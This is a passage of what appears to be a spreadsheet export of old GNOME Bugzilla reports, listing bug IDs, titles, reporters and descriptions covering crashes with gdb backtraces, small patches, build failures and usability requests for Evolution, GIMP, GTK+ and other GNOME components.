mcs -debug -nowarn:01620164016902190436 -unsafe -out:EvolutionBackends.dll -target:library ./EvolutionDataServerQueryable/BookContainer.cs ./EvolutionDataServerQueryable/CalContainer.cs ./EvolutionDataServerQueryable/Container.cs ./EvolutionDataServerQueryable/EvolutionDataServerQueryable.cs ./EvolutionDataServerQueryable/SourcesHandler.cs ./EvolutionMailDriver/EvolutionMailDriver.cs ./EvolutionMailDriver/EvolutionMailIndexableGenerator.cs ./EvolutionMailDriver/GConfThreadHelper.cs ./EvolutionMailDriver/MailCrawler.cs -r:BeagleDaemonLib.dll -r:/usr/lib/pkgconfig/../../lib/mono/compat-1.0/ICSharpCode.SharpZipLib.dll -r:../Util/Util.dll -r:../BeagleClient/Beagle.dll -r:./BeagleDaemonLib.dll -r:Mono.Posix -r:/usr/lib/evolution-sharp/evolution-sharp.dll -r:/usr/lib/pkgconfig/../../lib/mono/gtk-sharp-2.0/gconf-sharp.dll -r:/usr/lib/pkgconfig/../../lib/mono/gtk-sharp-2.0/gconf-sharp-peditors.dll -r:/usr/lib/pkgconfig/../../lib/mono/gtk-sharp-2.0/gnome-sharp.dll -r:/usr/lib/pkgconfig/../../lib/mono/gtk-sharp-2.0/pango-sharp.dll -r:/usr/lib/pkgconfig/../../lib/mono/gtk-sharp-2.0/atk-sharp.dll -r:/usr/lib/pkgconfig/../../lib/mono/gtk-sharp-2.0/gdk-sharp.dll -r:/usr/lib/pkgconfig/../../lib/mono/gtk-sharp-2.0/gtk-sharp.dll -r:/usr/lib/pkgconfig/../../lib/mono/gtk-sharp-2.0/art-sharp.dll -r:/usr/lib/pkgconfig/../../lib/mono/gtk-sharp-2.0/gnome-vfs-sharp.dll -r:/usr/lib/pkgconfig/../../lib/mono/gtk-sharp-2.0/glib-sharp.dll -r:/usr/lib/mono/gmime-sharp/gmime-sharp.dll
./EvolutionDataServerQueryable/EvolutionDataServerQueryable.cs(7319): error CS0407: `void Beagle.Daemon.EvolutionDataServerQueryable.EvolutionDataServerQueryable.StartWorker()' has the wrong return type to match the delegate `bool GLib.IdleHandler()'
Compilation failed: 1 error(s) 0 warnings</t>
  </si>
  <si>
    <t>GNORPM-4895</t>
  </si>
  <si>
    <t>GNORPM</t>
  </si>
  <si>
    <t>gnorpm crash</t>
  </si>
  <si>
    <t xml:space="preserve">Package: gnome-utils
Version: 0.9
Severity: 
&gt;Synopsis: crashed
&gt;Class: sw-bug
System: dual PII 350mgh 128 meg ram
&gt;Description:
process 4383 crashed due to a fatal error- segmentation fault when opening preferences in GNOME RPM
&gt;How-To-Repeat:
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-28 11:58 -------
This bug was previously known as bug 4895 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=4895
Originally filed under the gnome-utils product and general component.
The original reporter (tdisher@ympatico.ca) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component gnome-utils-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>tdisher</t>
  </si>
  <si>
    <t>GAL-202661</t>
  </si>
  <si>
    <t>Focus lost in Click to add task</t>
  </si>
  <si>
    <t>After double-clicking in Click here to add a task the focus is lost. The
mouse is not usable anywhere until you close the window or close evolution.</t>
  </si>
  <si>
    <t>GTK+-59221</t>
  </si>
  <si>
    <t>need robustness against invalid _gtk_tree_view_find_node</t>
  </si>
  <si>
    <t>Currently the code base assumes that all paths passed into
_gtk_tree_view_find_node are valid.  This is highly erronious and needs
correcting.</t>
  </si>
  <si>
    <t>LIBWNCK-428056</t>
  </si>
  <si>
    <t>leaks memory from text properties</t>
  </si>
  <si>
    <t>text_property_to_utf8() needs to free the return string array even if count is 0.</t>
  </si>
  <si>
    <t>GNOME-CALCULATOR-304056</t>
  </si>
  <si>
    <t>Default shortcut for '^' not intuitive?</t>
  </si>
  <si>
    <t>This bug has been opened here: https://bugzilla.ubuntu.com/10207
This bug may be needed to be moved upstream.  When a user enters a statement
with exponentiation using the keyboard instead of seeing the proper ^ in the
statement they will have entered in XOr.  Example: 5^2 entered with the
keyboard will become (and be calculated as) 5 XOr 2.  I'm not so sure that
many developers find this handy and for myself and the average user ^ should
be exponentiation not an exclusive or.  There seems to be no other sane keycode
for entering in exponentiation from the keyboard.  Even ** tosses up a
malformed statement error.  This interpretation of the ^ keycode needs to be
changed into the nicely sane default of exponentiation. 
...
The default shortcut for exponentiation is 'y' (as in 'x^y')
...
https://bugzilla.ubuntu.com/attachment.cgi?id=2205
'^' -&gt; calc_xpowy() and 'x' -&gt; calc_xor()
...
Ah there we go.  It seems that this is a simple three line patch to
lr_parser.y.  I ran the old ask 10 people usability test on what button people
use when they plug expressions into their software calculators and it's either
I use a mouse or I hit that carrot/hat/up arrow button.  Maybe it's
a cultural thing but so far no one has thought that y would be something they
would try.  I'm including a patch to switch '^' to calc_xpowy() and 'x' to
calc_xor().  I've triple checked to make sure this doesn't break anything in the
parser.  Feeling silly for making a new patch (and a new comment) for three
lines of work on such a trivial change.  The patch is against the latest CVS
but I doubt the parser has changed much.
[In case someone goes crazy:  ** should not be used as the new keycode for
exponentiation for a variety of reasons the most basic of these is that **
does not exist as an operator for most users and mathematicians (unless they
happen to be doing some numerical analysis).]</t>
  </si>
  <si>
    <t>GEGL-787467</t>
  </si>
  <si>
    <t>babl</t>
  </si>
  <si>
    <t>GEGL</t>
  </si>
  <si>
    <t>~/.cache/babl/babl-fishes nearly useless for GIMP</t>
  </si>
  <si>
    <t>After running GIMP one of the first babl-fishes cached in the cache file
is for a conversion to a format for the display color-space because
during babl_init babl doesn't yet know about that format it stops reading
the cached fishes and GIMP always recomputes all the fishes including
those I'm not going to need.
My suggestion is to not stop reading the cache file at the first
unknown format:
https://git.gnome.org/browse/babl/tree/babl/babl-cache.c#n370
perhaps registering only conversions between well known formats
thus including at least the fishes GIMP wants to precompute
Alternatively fishes not known to babl at babl_init time
should not be dumped in the cache file 
 or 
the info to reconstruct unknown formats should be included in the cache.</t>
  </si>
  <si>
    <t>sixtysix</t>
  </si>
  <si>
    <t>GNOME-APPLETS-168726</t>
  </si>
  <si>
    <t>mixer</t>
  </si>
  <si>
    <t>double-clicking inside the dock slider makes applet unresponsive</t>
  </si>
  <si>
    <t>Found an evil problem while attempting to reproduce Bug 168724
Add a volume control applet to your panel.
Click the icon once to pop out the slider.  Position the volume around the 50% mark.
Now double click on the top or the bottom half of the slider.  In both cases
the slider pops back in.
In the event that you double clicked on the top half the volume will gradually
increase (over the course of a second or two) until it is at 100%.  If you
double clicked the bottom half it will go to 0.
You can try to fight it with the scrollwheel or by pulling the slider out again
and manually repositioning it but it always keeps gradually going in the
direction you double clicked.  The only way to stop it is to remove the applet
from the panel.</t>
  </si>
  <si>
    <t>GNOME-DESKTOP-480062</t>
  </si>
  <si>
    <t>libgnome-desktop leaks on ditem execution</t>
  </si>
  <si>
    <t>Please describe the problem:
Index: ChangeLog
===================================================================
--- ChangeLog   (revision 4905)
+++ ChangeLog   (working copy)
@@ -13 +19 @@
+2007-09-25  Glynn Foster  
+
+       * gnome-desktop-item.c: (make_environment_for_screen): Use 
+        g_strfreev () to free the vector instead of g_free () so we
+        don't leak.
+
 ==================== 2.20.0 ====================
 ==================== 2.19.92 ====================
Index: gnome-desktop-item.c
===================================================================
--- gnome-desktop-item.c        (revision 4905)
+++ gnome-desktop-item.c        (working copy)
@@ -17227 +17227 @@
        g_assert (i == env_len)
        g_free (display_name)
-       g_free (freeme)
+       g_strfreev (freeme)
        return retval
 }
Steps to reproduce:
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>INTLTOOL-163689</t>
  </si>
  <si>
    <t>INTLTOOL</t>
  </si>
  <si>
    <t>intltool-extract misbehaves on empty msgids</t>
  </si>
  <si>
    <t>intltool-extract on XML assumes that message ids are nonempty which
causes strange behavior in cases like this:
Normal name
Other name
This would result in finding two msgids Normal name and
\nOther name.
The attached patch (against current CVS as of Jan 11 2005) allows empty msgids
for XML like when processing other file types. This does no harm because such
strings are not written out to the .h file anyway.
There were no testsuite regressions with this patch.</t>
  </si>
  <si>
    <t>intltool-maint</t>
  </si>
  <si>
    <t>GIMP-158369</t>
  </si>
  <si>
    <t>trying to search within the filetype list crash</t>
  </si>
  <si>
    <t>To reproduce:
1) Load an image
2) file&gt;save a copy
3) open the select file type list select an item in the list
4) Press Ctrl+S
Here's a backtrace of the crash:
#0  0x4138f672 in pthread_mutex_lock () from /lib/libpthread.so.0
#1  0x4072c356 in free () from /lib/libc.so.6
#2  0x405aab32 in g_free () from /opt/gnome/lib/libglib-2.0.so.0
#3  0x08136cf7 in gimp_file_dialog_proc_changed (view=0x9083c78
    dialog=0x8d30838) at gimpfiledialog.c:617
#4  0x405557b1 in g_cclosure_marshal_VOID__VOID ()
   from /opt/gnome/lib/libgobject-2.0.so.0
#5  0x40546d9b in g_closure_invoke () from /opt/gnome/lib/libgobject-2.0.so.0
#6  0x40557ca0 in signal_emit_unlocked_R ()
   from /opt/gnome/lib/libgobject-2.0.so.0
#7  0x40559371 in g_signal_emit_valist ()
   from /opt/gnome/lib/libgobject-2.0.so.0
#8  0x405596a2 in g_signal_emit () from /opt/gnome/lib/libgobject-2.0.so.0
#9  0x08137f58 in gimp_file_proc_view_selection_changed (selection=0x9083de8
    view=0x9083c78) at gimpfileprocview.c:333
#10 0x405557b1 in g_cclosure_marshal_VOID__VOID ()
   from /opt/gnome/lib/libgobject-2.0.so.0
#11 0x40546d9b in g_closure_invoke () from /opt/gnome/lib/libgobject-2.0.so.0
#12 0x40557ca0 in signal_emit_unlocked_R ()
   from /opt/gnome/lib/libgobject-2.0.so.0
#13 0x40559371 in g_signal_emit_valist ()
   from /opt/gnome/lib/libgobject-2.0.so.0
#14 0x405596a2 in g_signal_emit () from /opt/gnome/lib/libgobject-2.0.so.0
---Type  to continue or q  to quit---
#15 0x40315318 in gtk_tree_selection_unselect_all ()
   from /opt/gnome/lib/libgtk-x11-2.0.so.0
#16 0x4032d6c6 in gtk_tree_view_search_init ()
   from /opt/gnome/lib/libgtk-x11-2.0.so.0
#17 0x4032d86d in gtk_tree_view_real_start_interactive_search ()
   from /opt/gnome/lib/libgtk-x11-2.0.so.0
#18 0x4024d1f7 in _gtk_marshal_BOOLEAN__VOID ()
   from /opt/gnome/lib/libgtk-x11-2.0.so.0
#19 0x40546a87 in g_type_class_meta_marshal ()
   from /opt/gnome/lib/libgobject-2.0.so.0
#20 0x40546d9b in g_closure_invoke () from /opt/gnome/lib/libgobject-2.0.so.0
#21 0x405580d6 in signal_emit_unlocked_R ()
   from /opt/gnome/lib/libgobject-2.0.so.0
#22 0x405599c2 in g_signal_emitv () from /opt/gnome/lib/libgobject-2.0.so.0
#23 0x40187598 in gtk_binding_entry_activate ()
   from /opt/gnome/lib/libgtk-x11-2.0.so.0
#24 0x40187bac in binding_match_activate ()
   from /opt/gnome/lib/libgtk-x11-2.0.so.0
#25 0x40187d52 in gtk_bindings_activate_list ()
   from /opt/gnome/lib/libgtk-x11-2.0.so.0
#26 0x40187e43 in gtk_bindings_activate_event ()
   from /opt/gnome/lib/libgtk-x11-2.0.so.0
#27 0x40352534 in gtk_widget_real_key_press_event ()
---Type  to continue or q  to quit---
   from /opt/gnome/lib/libgtk-x11-2.0.so.0
#28 0x4032fac9 in gtk_tree_view_key_press ()
   from /opt/gnome/lib/libgtk-x11-2.0.so.0
#29 0x4024e024 in _gtk_marshal_BOOLEAN__BOXED ()
   from /opt/gnome/lib/libgtk-x11-2.0.so.0
#30 0x40546a87 in g_type_class_meta_marshal ()
   from /opt/gnome/lib/libgobject-2.0.so.0
#31 0x40546d9b in g_closure_invoke () from /opt/gnome/lib/libgobject-2.0.so.0
#32 0x405580d6 in signal_emit_unlocked_R ()
   from /opt/gnome/lib/libgobject-2.0.so.0
#33 0x405590cc in g_signal_emit_valist ()
   from /opt/gnome/lib/libgobject-2.0.so.0
#34 0x405596a2 in g_signal_emit () from /opt/gnome/lib/libgobject-2.0.so.0
#35 0x40345e64 in gtk_widget_event_internal ()
   from /opt/gnome/lib/libgtk-x11-2.0.so.0
#36 0x40356d54 in gtk_window_propagate_key_event ()
   from /opt/gnome/lib/libgtk-x11-2.0.so.0
#37 0x40359f3c in gtk_window_key_press_event ()
   from /opt/gnome/lib/libgtk-x11-2.0.so.0
#38 0x4024e024 in _gtk_marshal_BOOLEAN__BOXED ()
   from /opt/gnome/lib/libgtk-x11-2.0.so.0
#39 0x40546a87 in g_type_class_meta_marshal ()
   from /opt/gnome/lib/libgobject-2.0.so.0
---Type  to continue or q  to quit---
#40 0x40546d9b in g_closure_invoke () from /opt/gnome/lib/libgobject-2.0.so.0
#41 0x405580d6 in signal_emit_unlocked_R ()
   from /opt/gnome/lib/libgobject-2.0.so.0
#42 0x405590cc in g_signal_emit_valist ()
   from /opt/gnome/lib/libgobject-2.0.so.0
#43 0x405596a2 in g_signal_emit () from /opt/gnome/lib/libgobject-2.0.so.0
#44 0x40345e64 in gtk_widget_event_internal ()
   from /opt/gnome/lib/libgtk-x11-2.0.so.0
#45 0x40246621 in gtk_propagate_event ()
   from /opt/gnome/lib/libgtk-x11-2.0.so.0
#46 0x40247a11 in gtk_main_do_event () from /opt/gnome/lib/libgtk-x11-2.0.so.0
#47 0x4043bc22 in gdk_event_dispatch () from /opt/gnome/lib/libgdk-x11-2.0.so.0
#48 0x405a3e87 in g_main_context_dispatch ()
   from /opt/gnome/lib/libglib-2.0.so.0
#49 0x405a65c7 in g_main_context_iterate ()
   from /opt/gnome/lib/libglib-2.0.so.0
#50 0x405a77b7 in g_main_loop_run () from /opt/gnome/lib/libglib-2.0.so.0
#51 0x0808bb95 in app_run (full_prog_name=0xbffff142 /opt/gnome/bin/gimp
    gimp_argc=0 gimp_argv=0xbfffd7b8 alternate_system_gimprc=0x0
    alternate_gimprc=0x0 session_name=0x0 batch_interpreter=0x0
    batch_commands=0x837eec8 no_interface=0 no_data=0 no_fonts=0
    no_splash=0 be_verbose=0 use_shm=1 use_cpu_accel=1 console_messages=0
    stack_trace_mode=GIMP_STACK_TRACE_NEVER
---Type  to continue or q  to quit---
    pdb_compat_mode=GIMP_PDB_COMPAT_ON) at app_procs.c:375
#52 0x0808c9d5 in main (argc=1 argv=0xbfffd7b4) at main.c:473</t>
  </si>
  <si>
    <t>EVOLUTION-231844</t>
  </si>
  <si>
    <t>Calendar crashed when viewing</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Blocker
Version: GNOME2.1.0 1.1.1.99
Synopsis: Calendar crashed when viewing
Bugzilla-Product: Evolution
Bugzilla-Component: Calendar
Description:
Description of Problem:
The calendar crashed while i was trying to view my appointments. Evo was
still building the calendar view (populating my work week view with
appointments).
Before the calendar exited with an error: The calendar view has
exited you need to restart evolution to show folders of the calendar
type (or something like that) . I didn't ran kill-ev before restarting
evo.
Debugging Information:
Backtrace was generated from '/usr/bin/evolution-calendar'
[New Thread 1024 (LWP 2100)]
0x411354d9 in wait4 () from /lib/libc.so.6
#0  0x411354d9 in wait4 () from /lib/libc.so.6
#1  0x411ad30c in __DTOR_END__ () from /lib/libc.so.6
#2  0x4044a83a in waitpid () from /lib/libpthread.so.0
#3  0x40c35b6e in gnome_init () from /usr/lib/libgnomeui.so.32
#4  0x40448307 in pthread_sighandler () from /lib/libpthread.so.0
#5  
#6  0x40bf4be3 in gnome_canvas_item_set_valist ()
   from /usr/lib/libgnomeui.so.32
#7  0x40bf4ba5 in gnome_canvas_item_set () from
/usr/lib/libgnomeui.so.32
#8  0x0808f748 in e_day_view_reshape_day_event (day_view=0x8187888
day=3 
    event_num=0) at e-day-view.c:5473
#9  0x0808f47e in e_day_view_reshape_day_events (day_view=0x8187888
day=3)
    at e-day-view.c:5379
#10 0x0808eeac in e_day_view_check_layout (day_view=0x8187888)
    at e-day-view.c:5156
#11 0x08092d08 in e_day_view_layout_timeout_cb (data=0x8187888)
    at e-day-view.c:7722
#12 0x40f6be60 in g_main_set_poll_func () from
/usr/lib/libglib-1.2.so.0
#13 0x40f6afa5 in g_get_current_time () from /usr/lib/libglib-1.2.so.0
#14 0x40f6b5a9 in g_get_current_time () from /usr/lib/libglib-1.2.so.0
#15 0x40f6b738 in g_main_run () from /usr/lib/libglib-1.2.so.0
#16 0x40e881ef in gtk_main () from /usr/lib/libgtk-1.2.so.0
#17 0x4051635f in bonobo_main () from /usr/lib/libbonobo.so.2
#18 0x080b4a27 in main (argc=3 argv=0xbffffb34) at main.c:186
#19 0x410a21c4 in __libc_start_main () from /lib/libc.so.6
Thread 1 (Thread 1024 (LWP 2100)):
#0  0x411354d9 in wait4 () from /lib/libc.so.6
No symbol table info available.
#1  0x411ad30c in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x4044a83a in waitpid () from /lib/libpthread.so.0
No symbol table info available.
#3  0x40c35b6e in gnome_init () from /usr/lib/libgnomeui.so.32
No symbol table info available.
#4  0x40448307 in pthread_sighandler () from /lib/libpthread.so.0
No symbol table info available.
#5  
No symbol table info available.
#6  0x40bf4be3 in gnome_canvas_item_set_valist ()
   from /usr/lib/libgnomeui.so.32
No symbol table info available.
#7  0x40bf4ba5 in gnome_canvas_item_set () from
/usr/lib/libgnomeui.so.32
No symbol table info available.
#8  0x0808f748 in e_day_view_reshape_day_event (day_view=0x8187888
day=3 
    event_num=0) at e-day-view.c:5473
	event = (EDayViewEvent *) 0x8230ba8
	item_x = 511
	item_y = 743
	item_w = 125
	item_h = 149
	num_icons = 1
	icons_offset = -1073744400
	comp = (CalComponent *) 0x0
#9  0x0808f47e in e_day_view_reshape_day_events (day_view=0x8187888
day=3)
    at e-day-view.c:5379
	event_num = 1
#10 0x0808eeac in e_day_view_check_layout (day_view=0x8187888)
    at e-day-view.c:5156
	day_view = (EDayView *) 0x8187888
	day = 3
	rows_in_top_display = -1073743496
	top_rows = -512
#11 0x08092d08 in e_day_view_layout_timeout_cb (data=0x8187888)
    at e-day-view.c:7722
	data = 0x8187888
	day_view = (EDayView *) 0x8187888
#12 0x40f6be60 in g_main_set_poll_func () from
/usr/lib/libglib-1.2.so.0
No symbol table info available.
#13 0x40f6afa5 in g_get_current_time () from /usr/lib/libglib-1.2.so.0
No symbol table info available.
#14 0x40f6b5a9 in g_get_current_time () from /usr/lib/libglib-1.2.so.0
No symbol table info available.
#15 0x40f6b738 in g_main_run () from /usr/lib/libglib-1.2.so.0
No symbol table info available.
#16 0x40e881ef in gtk_main () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#17 0x4051635f in bonobo_main () from /usr/lib/libbonobo.so.2
No symbol table info available.
#18 0x080b4a27 in main (argc=3 argv=0xbffffb34) at main.c:186
	argc = 3
	argv = (char **) 0xbffffb34
#19 0x410a21c4 in __libc_start_main () from /lib/libc.so.6
No symbol table info available.
#0  0x411354d9 in wait4 () from /lib/libc.so.6
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>j.f.benckhuijsen</t>
  </si>
  <si>
    <t>GTHUMB-98755</t>
  </si>
  <si>
    <t>Rotate JPEG image option should be disabled if non-jpeg selected</t>
  </si>
  <si>
    <t>Rather than popping up an error message that says No JPEG selected it
would probably make more sense (and be better for usability) of the Rotate
JPEG image option was simply disabled (on both menu and toolbar where
applicable)    if a non-jpeg image is selected.</t>
  </si>
  <si>
    <t>tack-bugzilla</t>
  </si>
  <si>
    <t>EVOLUTION-243550</t>
  </si>
  <si>
    <t>The pre-edit changed call back for GtkHtml/Gal etc. are not implemented.</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:
Steps to reproduce the problem:
1. Login to ja_JP.PCK locale.
2. Take a new mail-Compose window. Click on the mail compose area.
3. Press Ctl-space to change the input method to ja.
4. Enter some characters nothing is displayed until Enter is pressed.
Actual Results:
The preedit characters should be displayed.
Expected Results:
No display.
How often does this happen? 
Always.
Additional Information:
Same issue happens in the calnder appointment entry in day view/week
view/work week view etc. However In some widgets like the subject area in
mail etc. This seem to work.</t>
  </si>
  <si>
    <t>suresh.chandrasekharan</t>
  </si>
  <si>
    <t>GNOME-UTILS-348333</t>
  </si>
  <si>
    <t>gdict-applet</t>
  </si>
  <si>
    <t>window can extend off edge of screen</t>
  </si>
  <si>
    <t>The fix for bug 346893 is really nice thanks!  However there is one minor case where the window may extend off the screen.  When the applet is positioned in the middle of a panel (1/2 monitor width) and the window is allowed to grow to 3/4 monitor width.</t>
  </si>
  <si>
    <t>GDM-105655</t>
  </si>
  <si>
    <t>Hindi language option needed in gdm language list</t>
  </si>
  <si>
    <t>GDM currently does not have Hindi language in language list ( locale.alias )
Hindi language is now supported in gnome 2.x there already quite few
translations.
Following needs to be added
Hindi        hi_IN.UTF8 hi_IN
More indian languages could be added
Kannada      kn_IN.UTF-8kn_IN
Malayalam    ml_IN.UTF-8ml_IN
Bengali      bn_IN.UTF-8bn_IN
Following dont have any translations yet in gnome
Gujrati      gj_IN.UTF-8gj_IN
Punjabi      pa_IN.UTF-8pa_IN
Oriya        or_IN.UTF-8or_IN
Marathi      mr_IN.UTF-8mr_IN
Telugu       te_IN.UTF-8te_IN</t>
  </si>
  <si>
    <t>karunakar</t>
  </si>
  <si>
    <t>GTKHTML-257167</t>
  </si>
  <si>
    <t>When you delete a signature the preview pane keeps the old signature contents when no signature is selected</t>
  </si>
  <si>
    <t>Description of Problem:
When you delete a signature the preview pane
keeps the old signature contents when no signature
is selected
Steps to reproduce the problem:
1. Go into signature settings
2. Select a signature
3. Press delete
Actual Results:
The preview pane still contains the preview of the
old signature
Expected Results:
It should be blank?
How often does this happen? 
Everytime.
Additional Information:
Nope.</t>
  </si>
  <si>
    <t>PYGTK-148569</t>
  </si>
  <si>
    <t>some occurrence of gtk.gdk.Atom aren't linked to it's page in the documentation</t>
  </si>
  <si>
    <t>In pygtk-docs/2.0/ref/pygtk-gdkwindow.xml four occurrences of gtk.gdk.Atom
aren't linked. They appear as (one example):
...tuple containing the actual property type (as a gtk.gdk.Atom) the format...
instead of:
tuple containing the actual property type (as a &lt;link
linkend=class-gdkatom&gt;gtk.gdk.Atom ) the format
(at least I guess that would be the preferred format)
In this file I found 4 such places a unified diff fixing these is attached.
I guess the real solution would be to have a script for checking such cases
(Whether classnames are linked to their corresponding pages or even more
generally whether things that should be linked like method names are indeed
linked.) I don't know how the docs are made currently I guess there is much
auto-generation used so a better solution might be something else.</t>
  </si>
  <si>
    <t>abli</t>
  </si>
  <si>
    <t>CONDUIT-517877</t>
  </si>
  <si>
    <t>CONDUIT</t>
  </si>
  <si>
    <t>Scrolling in Canvas Pane not working correctly</t>
  </si>
  <si>
    <t>This is something that people with smaller screens are more likely to run across.  I have a laptop that supports 1440x900 screens resolution after 5-6 sync groups it starts to place groups at the extreme bottom of the canvas pane.    The scroll bar on the right hand side is there but doesn't expand so there is no method for scrolling down and allowing you to create either new sync groups or manage those that are hidden.</t>
  </si>
  <si>
    <t>conduit-maint</t>
  </si>
  <si>
    <t>creeva</t>
  </si>
  <si>
    <t>RHYTHMBOX-125481</t>
  </si>
  <si>
    <t>[PATCH] Highlight text in Song Info dialog pressing mnemonic</t>
  </si>
  <si>
    <t>This patch took me three hours since I didn't note the bogus mnemonic
widget tags inside the glade file and blamed an obscure unknown bug I
claimed to have found. Manny stipud.
regs
 Chris</t>
  </si>
  <si>
    <t>GNOME-POWER-MANAGER-446506</t>
  </si>
  <si>
    <t>Wrong links in the docs</t>
  </si>
  <si>
    <t>From:
http://www.gnome.org/projects/gnome-power-manager/
the FAQ links nowhere</t>
  </si>
  <si>
    <t>GNOME-UTILS-74318</t>
  </si>
  <si>
    <t>gcharmap</t>
  </si>
  <si>
    <t>Accessibility changes for GCharmap</t>
  </si>
  <si>
    <t>The following need to be done for accessibility of
gcharmap :
1. Setup AtkRelation for the entry and the copy button in the
   main window.
2. Provide tooltip for the copy button.
3. Update the statusbar when the character buttons are navigated
   using the keyboard (tab and arrow keys).
4. Setup AtkRelation for the spin button and the entry in the
   'browse character' dialog.</t>
  </si>
  <si>
    <t>GNOME-MEDIA-94964</t>
  </si>
  <si>
    <t>Gnome-CD</t>
  </si>
  <si>
    <t>String cleanups and fix wmclass</t>
  </si>
  <si>
    <t>A patch with some string cleanups for HIG compliance (call the app CD
Player rather than Gnome-CD is the main idea).
Also wmclass should basically always be left as default (Gnome-cd)
per the ICCCM the window role should be used to distinguish individual 
windows in an app so there's a change along those lines.</t>
  </si>
  <si>
    <t>EVOLUTION-DATA-SERVER-347905</t>
  </si>
  <si>
    <t>[PATCH] allow creation of new mail folders with mh backend</t>
  </si>
  <si>
    <t>I came across a bug introduced in revision 1.40 of
camel/providers/local/camel-local-store.c
that prevented me from creating a new folder with a
MH back end.
This trivial patch fixes the issue.</t>
  </si>
  <si>
    <t>mcdavey</t>
  </si>
  <si>
    <t>GNOME-VFS-156760</t>
  </si>
  <si>
    <t>Seems to require later version of libbonobo than is checked by configure</t>
  </si>
  <si>
    <t>Please describe the problem:
Compiling failed in gnome-vfs-2.8.2/modules/vfolder with unresolved symbols that
seem to be from libbonobo:
gcc -g -O2 -o .libs/test-vfolder test-vfolder.o 
../../libgnomevfs/.libs/libgnomevfs-2.so /usr/lib/libgconf-2.so
/usr/lib/libbonobo-2.so /usr/lib/libORBitCosNaming-2.so
/usr/lib/libbonobo-activation.so /usr/lib/liblinc.so /usr/lib/libORBit-2.so
/usr/lib/libpopt.so /usr/lib/libgobject-2.0.so /usr/lib/libgthread-2.0.so
/usr/lib/libgmodule-2.0.so /usr/lib/libglib-2.0.so /usr/lib/libxml2.so -lpthread
-lz -lm -lssl -lcrypto -ldl -lresolv -lrt
../../libgnomevfs/.libs/libgnomevfs-2.so: undefined reference to
`bonobo_activation_i18n_get_language_list'
../../libgnomevfs/.libs/libgnomevfs-2.so: undefined reference to
`bonobo_poa_get_threaded'
collect2: ld returned 1 exit status
Steps to reproduce:
1. install libbonobo 2.0.1
2. configure and build gnome-vfs
3. 
Actual results:
build fails as above.
Expected results:
It should fail during configure due to libbonobo too old.
Does this happen every time?
probably
Other information:
The unresolved symbols are present in libbonobo-2.8.0 but not in
libbonobo-2.0.1.  According to configure 2.0.1 is OK:
check checking for glib-2.0 &gt;= 2.0.0 gmodule-2.0 &gt;= 2.0.0 gthread-2.0 &gt;= 2.0.0
gconf-2.0 &gt;= 1.1.1 bonobo-activation-2.0 &gt;= 1.0.0 libbonobo-2.0 &gt;= 2.0.0
ORBit-2.0 &gt;= 2.9.0 libxml-2.0 &gt;= 2.2.8 gnome-mime-data-2.0... yes</t>
  </si>
  <si>
    <t>ghouston</t>
  </si>
  <si>
    <t>GIMP-466189</t>
  </si>
  <si>
    <t>histogram errors</t>
  </si>
  <si>
    <t>Please describe the problem:
GIMP version 2.2.13 (Linux 2.4.33.3):
Histogram:
Channel Red..Blue: OK
Channel RGB        : Std Dev - error! (bad value)
Channel Value      : OK but not calculated correctly explained below:
max(rgb) is useless!!! and should be:
0299Â·r + 0587Â·g + 0114Â·b (YUV) or
02126*r + 07152*g + 00722*b (YCbCr - CCIR 601)
Steps to reproduce:
1. Use Layer-&gt;Colors-&gt;Histogram and compare with correct calculations
2. 
3. 
Actual results:
Histogram options Channel RGB and Value are (with jpeg-24bit-color pictures)
not calculated correctly 
Expected results:
Channel Value should be weighted sum of the nonlinear red green and blue signals
Channel RGB should have correctly calculated Std Dev
Does this happen every time?
Yes
Other information:</t>
  </si>
  <si>
    <t>a.kotlorz</t>
  </si>
  <si>
    <t>GSTREAMER-113607</t>
  </si>
  <si>
    <t>[build] CXXFLAGS vs. CPPFLAGS</t>
  </si>
  <si>
    <t>I think a bug is the easiest way to do this.
My build in HEAD/CVS doesn't work for the c++ plugins. Reason is Brian
Cameron's recent changes that move libbla_la_CXXFLAGS to
libbla_la_CPPFLAGS which causes the build to fail on my system. The FLAGS
are just not being set so I don't have any -I.... lines during
compilation so it fails. Changing it back to CXXFLAGS makes it work.
Examples of where this applies is the monkeyaudio plugin and modplug.
My system:
automake-1.6.3
autoconf-2.54c
gcc-2.96
We could add dual lines in each c++ plugin Makefile.am:
libbla_la_CPPFLAGS = ...
libbla_la_CXXFLAGS = $(libbla_la_CPPFLAGS)
But that's rather ugly. Anyone got a good solution here?</t>
  </si>
  <si>
    <t>EVOLUTION-207008</t>
  </si>
  <si>
    <t>crash from clicking on 'stop'</t>
  </si>
  <si>
    <t>To reproduce: 
1) do a time consuming search. I used a body search on my IMAP inbox for
the word 'test'.
2) hit the stop button in the toolbar. 
3) Watch evo go boom.
Trace: 
Thread 7 (Thread 5126 (LWP 7718)):
#0  0x40b48434 in imap_command_strdup_vprintf (store=0x8149950 
    fmt=0x40b52640 SELECT %F ap=0x433d47c8) at camel-imap-command.c:667
#1  0x40b486c1 in imap_command_strdup_printf (store=0x8149950 
    fmt=0x40b52640 SELECT %F) at camel-imap-command.c:748
#2  0x40b477e1 in camel_imap_command (store=0x8149950 folder=0x8213388 
    ex=0x0 fmt=0x0) at camel-imap-command.c:101
#3  0x40b478d7 in imap_command_start (store=0x8149950 folder=0x8213388 
    cmd=0x817ef60 UID SEARCH BODY \test\ ex=0x0)
    at camel-imap-command.c:178
#4  0x40b477f3 in camel_imap_command (store=0x8149950 folder=0x8213388 
    ex=0x0 fmt=0x40b530de UID SEARCH BODY \%s\)
    at camel-imap-command.c:105
#5  0x40b4d856 in imap_body_contains (f=0x86f4e58 argc=1 argv=0x433d48bc 
    s=0x86f4c58) at camel-imap-search.c:105
#6  0x4007a428 in e_sexp_term_eval (f=0x86f4e58 t=0x84d8a38) at e-sexp.c:643
